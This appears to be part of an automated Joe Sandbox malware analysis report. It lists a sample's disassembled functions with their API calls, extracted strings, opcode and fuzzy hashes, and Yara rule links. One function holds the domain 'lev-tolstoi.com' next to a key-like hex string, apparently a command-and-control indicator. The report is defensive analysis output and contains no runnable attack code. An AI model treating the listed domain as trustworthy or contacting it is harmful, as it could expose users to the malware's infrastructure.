Instruction Fuzzy Hash: A541D17BE047184BC718BF54DC5532BB6959BC5304F09803EB9C5AB3C2EEB89C05828A

Function 0042D1A4 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042D62C

Strings

5, xrefs: 0042D659
{, xrefs: 0042D1BA
CNd6, xrefs: 0042D6A4

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 5$CNd6${
API String ID: 3960555810-1601155441
Opcode ID: 1d6ee5fce619cc59d92231b303ad9e001e20aad935fc8eed8eb44ff96f82b468
Instruction ID: d3579ced008b1240718247bcc625fa3909845d2e02901f8e80a580c15fb3d2df
Opcode Fuzzy Hash: 1d6ee5fce619cc59d92231b303ad9e001e20aad935fc8eed8eb44ff96f82b468
Instruction Fuzzy Hash: 7DB1E13160C3918ED7298F2994603ABFBE1AFD3304F68496ED4D99B392C779440ACB57

Function 00417FB0 Relevance: 5.3, Strings: 4, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9', xrefs: 00417FE0
04-3, xrefs: 00417FCA
"-.#, xrefs: 00417FD5
G)I, xrefs: 00418063

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: G)I$"-.#$04-3$9'
API String ID: 0-991499
Opcode ID: fe207a812a7a7de0297151c35c74c3835ad873d896c309626031c5fa9e15daee
Instruction ID: 0bd526be77c85698cb9c24990b81f34b106bda5fa305ac09da14d4dbac32ab7c
Opcode Fuzzy Hash: fe207a812a7a7de0297151c35c74c3835ad873d896c309626031c5fa9e15daee
Instruction Fuzzy Hash: 8FB155729093119BDB218F15D8417EF77A1FF85328F09492EE8995B3A1E7389801CB96

Function 0040D072 Relevance: 5.3, Strings: 4, Instructions: 279
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1CAF9CB3F3F835CB88B9F97B60ED618D, xrefs: 0040D0BF
;<, xrefs: 0040D3D2
lev-tolstoi.com, xrefs: 0040D421
zAbC, xrefs: 0040D2B0

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 1CAF9CB3F3F835CB88B9F97B60ED618D$;<$lev-tolstoi.com$zAbC
API String ID: 0-3279647422
Opcode ID: f0ef59281c210f88dfb384b79dd03f3ddfdd7b1538eeefdad5af66cc8f071a69
Instruction ID: 118b889508cfe567c483e71ec93226a2c54febe15430ed9e2e4e8d84d284c7af
Opcode Fuzzy Hash: f0ef59281c210f88dfb384b79dd03f3ddfdd7b1538eeefdad5af66cc8f071a69
Instruction Fuzzy Hash: EC81CFB154D3D08BE335CF6198907DBBBE1ABDA314F184A6DC4C95B382C7394809CB9A

Function 00422BA0 Relevance: 4.4, Strings: 3, Instructions: 619
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9, xrefs: 00422DE4
,, xrefs: 00423119
!@, xrefs: 00422BEC

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: !@$,$9
API String ID: 0-2502672698
Opcode ID: d24ad947cb6c57ba7ef3b289cc3ac2b30acf8d1541035a3cd50400cdc0c601ac
Instruction ID: bc6fc98c22da22f4ab922aed425ac3019ab779c79b6f8b9c4d1add30748bb457
Opcode Fuzzy Hash: d24ad947cb6c57ba7ef3b289cc3ac2b30acf8d1541035a3cd50400cdc0c601ac
Instruction Fuzzy Hash: D0323371E083648FDB00CF78D5413AEBBF1AB45324F5885AED895AB381C77C8A45CB5A

Function 00409C1E Relevance: 3.1, APIs: 2, Instructions: 138libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000), ref: 00409CA2
LoadLibraryExW.KERNEL32(?,00000000), ref: 00409D82

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 56d2c7b48d7e5001a3ae768e98319e8d442f4ef1605532188a03b6d8a5809ff3
Instruction ID: 9b432d29faedb0fc16d266b21f82e57b2d28a7527b6aee5668727a15aa5185f3
Opcode Fuzzy Hash: 56d2c7b48d7e5001a3ae768e98319e8d442f4ef1605532188a03b6d8a5809ff3
Instruction Fuzzy Hash: C741E2B4E403409FDB149F78C9D6A9A3F71EB46324F5092ACD8502F3E6C635981ACBD6

Function 0043CF41 Relevance: 2.7, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

@, xrefs: 0043CFD9
L6E, xrefs: 0043CF73

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: @$L6E
API String ID: 2994545307-1202440179
Opcode ID: a23d7e9868f8a9cca9c12c4b1f97ccee45c9022efec959b3c474de0818ecdd2c
Instruction ID: c1ee7400262d1e0610de9b502be72d646b26d6e68564faa2d2008ea74ce73bb7
Opcode Fuzzy Hash: a23d7e9868f8a9cca9c12c4b1f97ccee45c9022efec959b3c474de0818ecdd2c
Instruction Fuzzy Hash: 4C51F875E102148BDB1CCF94DC927BEB772EB89308F28A16DC902B7395EB355C028798

Function 00440150 Relevance: 1.6, Strings: 1, Instructions: 361COMMON

Download Yara Rule

Strings

JIJK, xrefs: 00440210

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: JIJK
API String ID: 2994545307-1094643357
Opcode ID: aa87fa58789f5af3bc3fac2ead8abceba3d83f59d60b05f682cbc255520d899d
Instruction ID: a016a636cffca8e26528e362b3568a78d06246e9f426c2a17e905ca1ce6996d0
Opcode Fuzzy Hash: aa87fa58789f5af3bc3fac2ead8abceba3d83f59d60b05f682cbc255520d899d
Instruction Fuzzy Hash: 2BB1E0326083114FD718CE28C89196BB7E2EBC9314F19893DEA95C7391DB39DC56CB86

Function 0043C7A0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043EC4E,005C003F,0000002C,?,?,00000018,959697A8,00000000,?,?,?,?,00000000,00000000), ref: 0043C7CE

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0040B1A0 Relevance: 1.5, Strings: 1, Instructions: 232COMMON

Download Yara Rule

Strings

]>|0, xrefs: 0040B62A

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: ]>|0
API String ID: 0-2475017903
Opcode ID: a0a3e2f73b0ec9be7104128bda448993da256bfd1e4169b57de57bf625efa6de
Instruction ID: 34453aeea89ece734cb8ee81d1a6d752af7937882e103a56bce32cc94b6496d5
Opcode Fuzzy Hash: a0a3e2f73b0ec9be7104128bda448993da256bfd1e4169b57de57bf625efa6de
Instruction Fuzzy Hash: E6D1DBB4145B44CFE321CF65C585B96BBE0FB41308F508A1DC1AA2BBA0D7B5B146CF95

Function 0040B71C Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 254d2eed935ab114ea2af9fe2f318f2d143c8f135f1f0a7abeb4682b21d45e4c
Instruction ID: 137bac940e20bffea3374522f6f5df3c56ec510eb4529d0f041f24251b29cdd9
Opcode Fuzzy Hash: 254d2eed935ab114ea2af9fe2f318f2d143c8f135f1f0a7abeb4682b21d45e4c
Instruction Fuzzy Hash: 47C16B79104B01CFD3248F24EC51B67B7F5FB8A315F11896CE4AA876A0D735E816CB58

Function 0043F640 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de9afe3ab7e4b950448f2c1a26033e3d12d572daf1fd13881ae32bc7aa9eabd4
Instruction ID: 18d0810c0b7b4d40b13a7c4516b2d64624e8a127dde9a1e538e905749aec6462
Opcode Fuzzy Hash: de9afe3ab7e4b950448f2c1a26033e3d12d572daf1fd13881ae32bc7aa9eabd4
Instruction Fuzzy Hash: FF91F335A083019FC714DF28C880A6BB7E1EF99720F15993EE885973A1E734EC45C796

Function 0043AB60 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9ead48db058498347acb751522f1921f184dee1dbe5bcc703478af13c59f137e
Instruction ID: 187977e05fc41fd27ff6ba279ade2ed59036c0483c1d5fc33daca303c26171b1
Opcode Fuzzy Hash: 9ead48db058498347acb751522f1921f184dee1dbe5bcc703478af13c59f137e
Instruction Fuzzy Hash: F771AB76B483104BD728DE64C8D073BB782EB98314F19D93EDAC667381E6786C1187D6

Function 004275C0 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 66f626537c71d7aadcc13e15fafcf78c42570548889b15f19e963c9cf9d52cbb
Instruction ID: a9c23359af84cc21e23275746effcc7269a089668dac3d18fe8788ba91c5a8cd
Opcode Fuzzy Hash: 66f626537c71d7aadcc13e15fafcf78c42570548889b15f19e963c9cf9d52cbb
Instruction Fuzzy Hash: 497148747083205BD7149F25EC92A7B73A1DFC6314F98943EE4868B391E67CA806C35A

Function 0043D57C Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8afe951c43951d671385ec563c85d391c9afa19aeff77f12fb05ec13812c7a46
Instruction ID: d95e02464425a43eaef4ecf67336b58f5a47514e18bb587270472b221974b0a9
Opcode Fuzzy Hash: 8afe951c43951d671385ec563c85d391c9afa19aeff77f12fb05ec13812c7a46
Instruction Fuzzy Hash: A351F633F205114B9718CF69DC525AF73A3E7C9314B6A963EC822E7294DA38DD0286C9

Function 0043F130 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 697ffb298cdd0d7265bc8b4f9ac907118a939b01550197eb7fae985e477d01b2
Instruction ID: 990f49fba60c3a1a6c94dd758f95b17b88cdaabaa4d35143995dd83d9473ad43
Opcode Fuzzy Hash: 697ffb298cdd0d7265bc8b4f9ac907118a939b01550197eb7fae985e477d01b2
Instruction Fuzzy Hash: FE513A39B443009BE7189F69DC90B7BB792EBD8310F19953DE896533E0DA39AC09C749

Function 0043CDC8 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8262d4f10d77bcb9eb74e415945a28684f8670af73a6f807e316791603ff5fe3
Instruction ID: 6915aa18b07d9d17e38c6d984b53141ee5d10fd8ddaa2e57d9ae7f6e326c45fc
Opcode Fuzzy Hash: 8262d4f10d77bcb9eb74e415945a28684f8670af73a6f807e316791603ff5fe3
Instruction Fuzzy Hash: 3431E237A105104BDB1CCF68CC5277A7292E789315F6A962EC813EB2E5DA745C028788

Function 0043D29C Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 144aae91edc0d65044003935e2a10a512176c32bc3c5d8ce26c1504ab4a15192
Instruction ID: 0fae95f8a8a16c212c24583100b634e944e7160a773601560c9025520cf195fc
Opcode Fuzzy Hash: 144aae91edc0d65044003935e2a10a512176c32bc3c5d8ce26c1504ab4a15192
Instruction Fuzzy Hash: 5831C436B102054BEB1CCEA8DCA2BBE7363E7C5314F29912DD9129B2D4DF785D068745

Function 0043D3F3 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91de01c23a386bf8e85c45390db4ad28f50f60faf13a36dc33f76ae0af12e667
Instruction ID: 128dc40ed1c7fdaaea16417f5870d9fb985e1018be89d3502ed24059acbd577a
Opcode Fuzzy Hash: 91de01c23a386bf8e85c45390db4ad28f50f60faf13a36dc33f76ae0af12e667
Instruction Fuzzy Hash: C631F537E20160479F1CCF68EC6267E73A3EB89315B5E957DC953A7291DE349C028788

Function 0043C710 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 0043C74C

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2f7600e318456a12395069fdd4a85b6e9fc90c00c62735cf5287de99d1559589
Instruction ID: 8f002d91bdeca3fa21edc8c9f8fcf0c04cffd6be370c740cb867fdad84eeb23f
Opcode Fuzzy Hash: 2f7600e318456a12395069fdd4a85b6e9fc90c00c62735cf5287de99d1559589
Instruction Fuzzy Hash: 3DF0F63A948112EBC6106F25BC05A1B7378DF8B321F011439F40953111EB38D811D6AF

Function 004323A2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004323EA

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 549c14ed47b4c10347ef748b26a5d00f03ff47930fc7942e4991c13974b0fda9
Instruction ID: c59e547b3bc55eb8e65bb54acff9741ceb6cf3db7379961af74f48598cfa5155
Opcode Fuzzy Hash: 549c14ed47b4c10347ef748b26a5d00f03ff47930fc7942e4991c13974b0fda9
Instruction Fuzzy Hash: A601E7B49087028FE310DF25D498B56BBE1FB84308F11882CE4A58B394DBB5A589CF82

Function 0043AB10 Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,00413F22), ref: 0043AB46

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4c1efe6b780792c61a278fab49e9e03925425d989ce49dbe685b7dc64db5304b
Instruction ID: 9f163d060e5128e52a4d549381e6a10ade3dc30705b52d2715dc5942a9aa12e7
Opcode Fuzzy Hash: 4c1efe6b780792c61a278fab49e9e03925425d989ce49dbe685b7dc64db5304b
Instruction Fuzzy Hash: 33E01231105201EBC2301F5AAC0AB5BBBB6EB9AB62F015A7DA401961A5CB72D8418B98

Function 0040D000 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D013

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: cef12fd8fff3f28fecd0c6c9e28e2867cffb628f124554876d21a93832989865
Instruction ID: 36e51793d4ee227331f1ce8cf406bb72860a6d7854835cd0db2c8415f14b7676
Opcode Fuzzy Hash: cef12fd8fff3f28fecd0c6c9e28e2867cffb628f124554876d21a93832989865
Instruction Fuzzy Hash: CCE02B7875320437D248971AEC47FA7322D93C7315F09423DB563D76C2CD30A80581B4

Function 004301CA Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00430215

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: f3356faf4201d1dc2c78fd93264b643f72b45d2b68d79b2103100722f3604e64
Instruction ID: 2dff411b8a48cfe58ce972252303d299e3edcc20acdf12bf35a4ad5ffad5669d
Opcode Fuzzy Hash: f3356faf4201d1dc2c78fd93264b643f72b45d2b68d79b2103100722f3604e64
Instruction Fuzzy Hash: A6F0D4B4108701CFE314DF25C0A871BBBE1BB84308F50891CE0994B390C7BAA649CFD6

Function 00409DC1 Relevance: 1.5, APIs: 1, Instructions: 20networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00409DDC

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 4b1e705f0b2e4ecbdab73577aaf0b4912d61eb34c83dc51814c4254c497a9364
Instruction ID: 342e80120437838faac730cf4e2e45fa022b0e8e749089258c5de8b43cafc637
Opcode Fuzzy Hash: 4b1e705f0b2e4ecbdab73577aaf0b4912d61eb34c83dc51814c4254c497a9364
Instruction Fuzzy Hash: A7E02B7DB5310267E70C9F61EC7277E3356C3AE705B08843DA813C22E1DE394411C600

Function 0040D040 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D052

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 6023feb0320b9b02c4b830bd19f4d9f6d08177e2e8d33b0f774df5ffaee30bb7
Instruction ID: 30357f2af88c338fa2ea666d56b1458522517999325f607476e75c1806feade3
Opcode Fuzzy Hash: 6023feb0320b9b02c4b830bd19f4d9f6d08177e2e8d33b0f774df5ffaee30bb7
Instruction Fuzzy Hash: 53D092343D82027BF6244B18AC53F1422515346F25F380624B3A2FE2D0CAE07101861C

Function 0043C9D3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043C9E1

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: bc39e0f25a2ee6cbad0b415e84c52d1932c8997831be6e28b9602051929c9e4c
Instruction ID: 7bf3d9de88f8a3cf5b2a6805ed71ac48d9ef51854c1912fd13a87cb76cf95a64
Opcode Fuzzy Hash: bc39e0f25a2ee6cbad0b415e84c52d1932c8997831be6e28b9602051929c9e4c
Instruction Fuzzy Hash: 49E012B9E402048FCB44DFA4ECE586977B4F79A346720143EE146C3391DA35E605DF48

Function 0043AAFB Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 0043AB01

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 105ceb88612a64d59b3052585eacb7b5a6aca9e57d958a351d48b8a964e8467c
Instruction ID: 99638a9deef3dfc6cc7dd237d899bbc5754c5ef854ccb647a3fdbe39c79c1fff
Opcode Fuzzy Hash: 105ceb88612a64d59b3052585eacb7b5a6aca9e57d958a351d48b8a964e8467c
Instruction Fuzzy Hash: 79A01130080220AACA222F00BC08FC23F20EB202A2F0200A0B000080B2822088A2CA88

Non-executed Functions

Function 004369F3 Relevance: 91.6, Strings: 73, Instructions: 386COMMON

Download Yara Rule

Strings

2, xrefs: 00436C75
%, xrefs: 00436CFA
n, xrefs: 00436A99
!, xrefs: 00436CDE
U, xrefs: 00436ACA
O, xrefs: 00436B87
G, xrefs: 00436A29
K, xrefs: 00436A84
,, xrefs: 00436C4B
#, xrefs: 00436CEC
u, xrefs: 00436BAA
!, xrefs: 00436E91
U, xrefs: 00436A0D
m, xrefs: 00436B72
', xrefs: 00436EA9
1, xrefs: 00436D4E
E, xrefs: 00436A5A
), xrefs: 00436EB1
', xrefs: 00436D08
+, xrefs: 00436D24
;, xrefs: 00436D94
A, xrefs: 00436A3E
\, xrefs: 00436BA3
>, xrefs: 00436DA9
%, xrefs: 00436EA1
x, xrefs: 00436B95
S, xrefs: 00436ABC
|, xrefs: 00436AFB
O, xrefs: 00436AA0
), xrefs: 00436F98
9, xrefs: 00436D86
/, xrefs: 00436D40
-, xrefs: 00436D32
;, xrefs: 00436E79
y, xrefs: 00436BC6
#, xrefs: 00436E99
], xrefs: 00436B02
Q, xrefs: 00436AAE
e, xrefs: 00436B3A
a, xrefs: 00436B1E
}, xrefs: 00436BE2
k, xrefs: 00436B64
|, xrefs: 004369FF
[, xrefs: 00436AF4
o, xrefs: 00436B80
?, xrefs: 00436DB0
t, xrefs: 00436AC3
G, xrefs: 00436A68
), xrefs: 00436D16
7, xrefs: 00436D78
s, xrefs: 00436B9C
W, xrefs: 00436AD8
_, xrefs: 00436B10
i, xrefs: 00436B56
3, xrefs: 00436D5C
=, xrefs: 00436DA2
4, xrefs: 00436F82
C, xrefs: 00436A4C
c, xrefs: 00436B2C
w, xrefs: 00436BB8
=, xrefs: 00436E81
I, xrefs: 00436A76
{, xrefs: 00436BD4
(, xrefs: 00436EAD
5, xrefs: 00436D6A
q, xrefs: 00436B8E
M, xrefs: 00436A92
d, xrefs: 00436A53
, xrefs: 00436BF7
@, xrefs: 00436B17
g, xrefs: 00436B48
?, xrefs: 00436E89
Y, xrefs: 00436AE6

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: $!$!$#$#$%$%$'$'$($)$)$)$+$,$-$/$1$2$3$4$5$7$9$;$;$=$=$>$?$?$@$A$C$E$G$G$I$K$M$O$O$Q$S$U$U$W$Y$[$\$]$_$a$c$d$e$g$i$k$m$n$o$q$s$t$u$w$x$y${$|$|$}
API String ID: 0-3145234419
Opcode ID: 3ce2d9f1c5bc2b6d78548ae3f2526d6fd4f0ff79ddfcde1f4cc568e42f585da3
